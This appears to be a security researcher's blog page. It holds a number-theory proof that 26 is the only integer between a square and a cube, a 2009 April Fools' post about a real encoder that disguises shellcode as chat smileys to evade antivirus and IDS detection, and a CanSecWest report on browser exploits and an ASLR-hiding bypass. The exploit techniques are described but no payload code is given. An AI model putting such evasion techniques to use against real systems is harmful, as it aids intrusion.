When I was in college, I really liked the kind of demonstrations where we used a superset of a given set to prove properties in the first set. Here, we see b^3=a^2+2 and feel hopeless. If only a^2+2 could be factorized... Well, it can be factorized. I didn't spend my youth learning about Cauchy sequences and how to construct R and its algebraic closure C for nothing! So let s be i*sqrt(2) and we have b^3=(a-s)(a+s). But what can we do now?
I wanted to play with prime numbers, divisors and gcds, and now we're stuck with complex numbers. Hold on! It turns out that the set of numbers of the form x+y*s (with x and y integers), written Z[s], with the usual operations is not only a ring (called a quadratic integer ring) but also a Euclidean domain, and that its units are 1 and -1 (proof of this another time). We can still have some fun (for some definitions of fun, including any that would qualify the aforementioned Polish club as fun).

So we now have (a-s)(a+s)=b^3. Let's prove that a-s and a+s are mutually prime. Let g be their gcd. g must divide (a+s) - (a-s) = 2s = -s^3. s is prime in Z[s], so g=+- s^x with x being 0, 1, 2 or 3. But g also divides a+s, if x>0, then s divides a+s and so s divides a. But we already know (from the club, remember), that a is odd. And s (i*sqrt(2)) cannot divide an odd number in Z[s]. So x=0 and a-s and a+s are mutually prime.

Since Z[s] is a Euclidean domain, the fundamental theorem of arithmetic holds (Z[s] is a unique factorization domain): any number in Z[s] can be written as the product of the elements of a unique set of prime numbers (and units). So we can write a-s, a+s and b^3 as products of primes (and units). Since a-s and a+s are mutually prime, each of them is a cube multiplied by some unit. Since 1 and -1, the only units of Z[s], are both cubes, a-s and a+s are cubes.

So let's write a+s=(m+ns)^3 with m and n integers. We get: a+s=m^3-6mn^2+n*(3m^2-2n^2)s. The uniqueness of m' and n' such that x = m'+n'*s in Z[s] (with m' and n' in Z) gives: n*(3m^2-2n^2)=1. So n=+-1. If n = 1, we have 3m^2-2=1 and m = +-1. If n = -1, there is no solution for m. So n=1 and m = +-1. We also have a=m^3-6mn^2, so a = 5 or a = -5, which in turn gives b=3.

So the only integer solutions to b^3=a^2+2 are (a,b)=(5,3) and (a,b)=(-5,3) and 26 is the only integer preceded by a square and followed by a cube.
Happy birthday Parisa!

Now what about an integer preceded by a cube and followed by a square? If Wikipedia is right, there is no integer solution to b^3=a^2-2. Well, there is actually one trivial solution (b=-1 and a=+-1), so Wikipedia is wrong, but is it the only solution? We could be tempted to follow a similar approach: let s' be sqrt(2) and use Z[s'], which is also a ring. But -1 and 1 are not its only units: s'-1 and s'+1 are also units since (s'-1)(s'+1)=1, and so we have an infinite number of units of the form +-(s'-1)^m and +-(s'+1)^m.
Moreover, is Z[s'] still a unique factorization domain? It is (Z[sqrt(2)] is in fact norm-Euclidean), but you may have to prove it if you want to show that 0 is the only number preceded by a cube and followed by a square (for example, to celebrate your 0-year-old newborn baby).
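Both equations are easy to sanity-check numerically. Here's a small brute-force search in Python (bounded, so it proves nothing by itself; it merely agrees with the proofs above):

```python
from math import isqrt

def solutions(c, bound=10_000):
    """Find all integer pairs (a, b) with b**3 == a**2 + c and |b| <= bound."""
    sols = []
    for b in range(-bound, bound + 1):
        x = b ** 3 - c  # candidate value for a**2
        if x >= 0 and isqrt(x) ** 2 == x:
            a = isqrt(x)
            sols += [(-a, b), (a, b)] if a else [(0, b)]
    return sols

print(solutions(2))   # b^3 = a^2 + 2  -> [(-5, 3), (5, 3)]
print(solutions(-2))  # b^3 = a^2 - 2  -> [(-1, -1), (1, -1)]
```

Within the search bound, the only solutions found are exactly (a,b)=(+-5,3) for the first equation and the trivial (a,b)=(+-1,-1) for the second.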

Wednesday, April 1, 2009

Massive exploitation of instant messaging applications proved feasible

EDIT: While most realized this was an April Fools' joke, only a few figured out that it is also a genuine smiley shellcode encoder. The security implications are, of course, non-existent. And we have been slashdotted!

Yoann Guillot and myself have been assessing the security of instant communication applications for a couple of years.
For quite some time now, we have both suspected that it was possible to conduct stealthy, massive attacks on popular chat clients such as MSN, AIM, Trillian or mIRC.

Today, we have verified our intuition by creating an encoder that can make any shellcode look like a smiley. It is possible to encode malicious shellcodes in emoticons, leaving exploits indistinguishable from genuine chat messages.

This would make massive attacks against instant messaging applications impossible for anti-virus, IDS or similar signature-based technologies to catch. Moreover, it makes attacks with plausible deniability possible.

The potential for mass exploitation is undeniable. We urge Microsoft, AOL and other administrators of popular chat networks to ban smileys (especially animated ones) until all the consequences of this attack are understood. Twitter and Facebook are likely vulnerable too, although we haven't yet conducted specific research on those networks.

This proof-of-concept program will compile the included sample shellcode, encode it into a valid MSN smiley and build a test C program using metasm. While the example shellcode and the compiled test program both target Linux, you can supply any shellcode you want, including a Windows one, on the command line.

Please use as follows:

"apt-get install libc6-dev-i386 mercurial ruby" if required
"hg clone"
"cd metasm"
put smile.rb in the metasm directory
"ruby ./smile.rb"

Sunday, March 29, 2009

CanSecWest 2009 report

I am back from CanSecWest. Like every year, it was interesting and great fun. And for the first year, presentation material has been put online in a matter of days!

I would definitely recommend checking out the following talks:
  • Immunity's talk about exploiting bugs smoothly, without unwanted side effects. Interesting, but this talk could have used a few real-world examples.
  • Loic Duflot's talk about attacking SMM via CPU cache poisoning, something that was apparently independently rediscovered a few months later by Joanna. Be sure to attend the follow-up talk at SSTIC if you understand French!
  • Halvar's talk about static binary analysis and the accompanying paper. Yes, he really does binary-level abstract interpretation.
  • Matt Miller (skape) and Tim Burrell's talk about the evolution of exploit mitigation in Microsoft's products. Some insight about what has been done and what may be done in the future. A good way to check that you're still up-to-date.
  • Microsoft's Jason Shirk and Dave Weinstein presentation about their !exploitable crash analyser.
  • Alexander Sotirov and Mike Zusman's talk about EV certificates. The general idea is based on Adam Barth and Collin Jackson's paper, which showed how browsers fail to draw a clear barrier between EV SSL and non-EV SSL, including when applying the same-origin policy. This is expected behavior since both are served under the https:// scheme, but the result is that EV, as currently implemented, is useless against MITM attacks (though still useful against phishing attacks). Alexander and Mike showed various ways of exploiting this, with cool demos!
There were other good talks, such as Andrea and Daniele's on power line leakage (very entertaining, but a bit less than last year's talk).

Nevertheless, this year I was quite disappointed with the lightning talks: only a handful of people bothered to give one. Most were probably eager to head to Grouse Mountain for the awesome party!

  • The highlight of the lightning talks was someone showing the parallels between old-school and today's technologies (finger <-> twitter, talk <-> chat, etc.), with cool pure-ASCII slides.
  • Philippe Biondi talked about stateful protocol modelization in Scapy (with a TCP example).
  • Raphaël Rigo presented his Nintendo DS Wifi scanner.
  • Tavis Ormandy and I talked about bypassing Linux's recent hiding of the /proc/pid/maps file (meant to make ASLR useful locally). The idea is to monitor the stack and instruction pointers in /proc/pid/stat to infer the address space layout (Tavis wrote cool PoC code for this!). Funny to see info-leak prevention done wrong 6 years after grsecurity and PaX+obs did it right.
  • I presented my subtty backdoor.
  • Charlie Miller told us how bad it is to report bugs for free. I wonder if he might be biased on this.
Another interesting event was the 2009 edition of pwn2own. Everything exciting happened on day 1, since not many people were interested in the phone challenges, and those who were had been annoyed by the lack of specifications before the challenge and couldn't get ready in time.

Charlie Miller owned Safari, Nils owned Safari, Firefox and IE8, and I owned Safari and Firefox. For those of you who are asking, I actually paired with someone (more information on this in a later post) and we didn't qualify for a prize because the vulnerabilities had already been reported.
The reason for competing anyway was that, technically, this would still qualify us to keep the machine (and also, I must admit, because it's always fun to pop some shells). However, Charlie was lucky enough to get the first try (I was second) and so kept the Mac.
Well, I guess that's what you get for not being good researchers and not sitting on issues ;)

On Friday, many people left for Whistler for a great ski trip and further interesting security discussions. It was the perfect sequel to a great CanSecWest edition!

Sunday, March 22, 2009

Blog boot!

I have finally decided to open a blog. I am not exactly an early adopter, it took me a long time to feel the need of having one.
IT security has been a long-time interest of mine. I've usually shared thoughts, ideas and opinions in bars, restaurants and conferences or on IRC; I'll use this blog to reach a broader audience.
I'll also use it to publish new tools; I hope it will be more user-friendly than raw updates to

So, here's my first post from Whistler, Canada, just after the CanSecWest security conference!